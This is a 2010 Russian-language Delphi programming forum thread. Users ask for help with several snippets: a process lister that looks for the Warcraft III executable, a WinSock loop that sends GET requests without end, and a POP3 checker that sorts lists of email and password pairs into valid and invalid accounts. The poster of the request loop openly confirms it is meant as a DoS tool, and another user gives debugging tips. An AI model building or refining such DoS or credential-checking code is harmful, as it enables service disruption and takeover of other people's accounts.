Старый 11.07.2010, 16:49   #21
Юра
 
Аватар для Юра
 
Регистрация: 10.07.2010
Сообщений: 11
Репутация: 0
По умолчанию

Мне кажется то в самом коде ..
Юра вне форума   Ответить с цитированием
Старый 11.07.2010, 18:56   #22
W!z@rD
 
Аватар для W!z@rD
 
Регистрация: 04.07.2010
Сообщений: 33
Репутация: 15
По умолчанию

на будущее:
1. скрины в jpg/jpeg/png формате
2. Пуск - выполнить - cmd.exe -> остальные команды (консольное окно закрываться не будет)

Последний раз редактировалось W!z@rD; 05.10.2010 в 07:29..
W!z@rD вне форума   Ответить с цитированием
Старый 11.07.2010, 19:27   #23
Юра
 
Аватар для Юра
 
Регистрация: 10.07.2010
Сообщений: 11
Репутация: 0
По умолчанию

Пинг 165 мсек..
Что делать блин?
Юра вне форума   Ответить с цитированием
Старый 12.07.2010, 10:36   #24
mailbrush
 
Регистрация: 06.07.2010
Сообщений: 47
Репутация: 4
По умолчанию

Цитата:
Сообщение от Юра Посмотреть сообщение
Пинг 165 мсек..
Что делать блин?
Не мало, но и не много.
Меняю свое мнение, возможно, инди что-то мутит.
Вообще, не советую тебе его использовать, попробуй на сокеты перепиши + многопоточность (через TThread проще).
mailbrush вне форума   Ответить с цитированием
Старый 12.07.2010, 12:54   #25
ReanimatoR
 
Аватар для ReanimatoR
 
Регистрация: 09.07.2010
Сообщений: 29
Репутация: 3
По умолчанию

Получение списка процессов работает на win7\vista от прав администратора, а вот на XP не работает О_О?!
// Delphi 7


Код:
procedure TForm1.FormCreate(Sender: TObject);

var p:PROCESSENTRY32;ct:cardinal;th:Cardinal; mp:array[0..255] of char;
 mm:pchar;ts:TSearchRec; sst:STARTUPINFO;  ss,s:string;

begin
Edit3.Text:= (GetDiskSerialNumber('C'));
ct:=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
 Process32First(ct,p);
 while Process32Next(ct,p) do begin
  begin
  if ExtractFileName(Application.ExeName)=string(p.szExeFile) then
    OpenProcessToken(p.th32ProcessID,TOKEN_READ,th);
    if string(p.szExeFile) = 'war3.exe'  then begin
    Memo1.Text := 'War3.exe ??????. ??? PID '+inttostr(p.th32ProcessID);
    Memo2.Text :=  inttostr(p.th32ProcessID);
    tid :=   p.th32ProcessID;
    war3 := 1;
    end;
   ListBox1.Items.Append(string(p.szExeFile));
   ListBox2.Items.Append(inttostr(p.th32ProcessID));

  end;
 end;
 if war3 = 0 then begin
 msgbox('Ошибка блиаааа','Не могу найти процесс war3.exe, либо вы нихуя не запустили warcraft III, либо запустили программу без прав администратора, в любом случае идите нахуй, программа работать так не будет.');
 end;
__________________
[ InfoSecurity ] [ AntiDDos ]
ReanimatoR вне форума   Ответить с цитированием
Старый 12.07.2010, 15:21   #26
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию Вероятно тут мне могут помочь теоретически, но не уверен...

Есть функция отправки GET запроса на хост через сокеты, мне нужно сделать её в бесконечном цикле, чтобы она постоянно слала на хост этот запрос.
Но проблема в том, что при реализации этого через библиотеку WinSock запросы успешно выполняются, но и + ко всему на компьютере открывается кучу соединений, в результате чего компьютер попросту намертво виснет.
Вот моя функция:

Код:
function fWSRecv():string;
var
hSocket: TSocket;
hHost: PHostEnt;
hAddr: TSockAddrIn;
hTimeout: TTimeVal;
samzapros,kuda:string;
begin
 kuda:='localhost';
 samzapros:='GET /log/ass.php' + #13#10 +
'Host: localhost' + #13#10 +
'User-Agent: Mozilla/5.0' + #13#10 +
'Accept: text/html' + #13#10 +
'Accept-Language: ru' + #13#10 +
'Accept-Charset: windows-1251' + #13#10 +
'Connection: close' + #13#10#13#10;
 hHost := gethostbyname(PChar(kuda));
 hAddr.sin_family := PF_INET;
 hAddr.sin_port := htons(80);
 hAddr.sin_addr := pinaddr(hHost^.h_addr^)^;
 hTimeout.tv_usec := 0;
// hTimeout.tv_sec := 10000;

      while true do begin
 hSocket := socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
 if hSocket <> 0 then begin
 setsockopt(hSocket, SOL_SOCKET, SO_RCVTIMEO, @hTimeout, sizeof(ttimeval));
 if connect(hSocket, hAddr, SizeOf(hAddr))=0 then begin
 Send(hSocket, samzapros[1], length(samzapros), 0);
  sleep(1000);
 end;
 CloseSocket(hSocket);
 end;
 end;
end;
Вызываю так:
var
ws:TwsaData;
begin
WSAStartup($101, ws);
fWSRecv;

и всё, куча соединений и т.д... вообще даже приблизительно не знаю, в каком месте у меня ошибка.
Nightmare вне форума   Ответить с цитированием
Старый 12.07.2010, 17:58   #27
W!z@rD
 
Аватар для W!z@rD
 
Регистрация: 04.07.2010
Сообщений: 33
Репутация: 15
По умолчанию

Nightmare
1. имха 1 секунды маловато будет, получается что-то вроде ддоса.
2. За 1 секунду врятли ресурсы успевают освобождаться.
3. сделай это в отдельном потоке с минимальным приоритетом.
4. if hSocket <> 0 then begin, а если ошибка?
W!z@rD вне форума   Ответить с цитированием
Старый 12.07.2010, 18:14   #28
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Цитата:
Сообщение от W!z@rD Посмотреть сообщение
Nightmare
1. имха 1 секунды маловато будет, получается что-то вроде ддоса.
2. За 1 секунду врятли ресурсы успевают освобождаться.
3. сделай это в отдельном потоке с минимальным приоритетом.
4. if hSocket <> 0 then begin, а если ошибка?
Ну вообще то это и есть именно dos, потому ставить 10-20 секунд не вариант.
в отдельном потоке это дело тоже ничего не решает, а приоритет хз поможет\нет.
Nightmare вне форума   Ответить с цитированием
Старый 16.07.2010, 12:14   #29
Юра
 
Аватар для Юра
 
Регистрация: 10.07.2010
Сообщений: 11
Репутация: 0
По умолчанию

Никто не может помочь?(
Цитата:
for l:=0 to StringGrid1.RowCount-1 do
begin
Email1 := Pos('@', StringGrid1.Cells[0, l + 1]);
Username := Copy(StringGrid1.Cells[0, l + 1], 1, Email1 - 1);
pop:='pop.'+copy(StringGrid1.Cells[0, l + 1], Email1 + 1, Length(StringGrid1.Cells[0, l + 1]));
idpop31.Username := Username;
idPop31.Password := StringGrid1.Cells[1,l+1];
idpop31.Host := pop;
try try
IdPOP31.Connect(5000);
if IdPOP31.Connected then
StringGrid1.Cells[2,l+1]:='Валид';
except
StringGrid1.Cells[2,l+1]:='Невалид';
end;
finally
IdPOP31.Disconnect;
end;
end;
end;
Юра вне форума   Ответить с цитированием
Старый 16.07.2010, 12:17   #30
W!z@rD
 
Аватар для W!z@rD
 
Регистрация: 04.07.2010
Сообщений: 33
Репутация: 15
По умолчанию

>>try try

1. Что это?

try
...
except
...
finally

2. Прозвучали предложения: WinSock, многопоточность.
W!z@rD вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot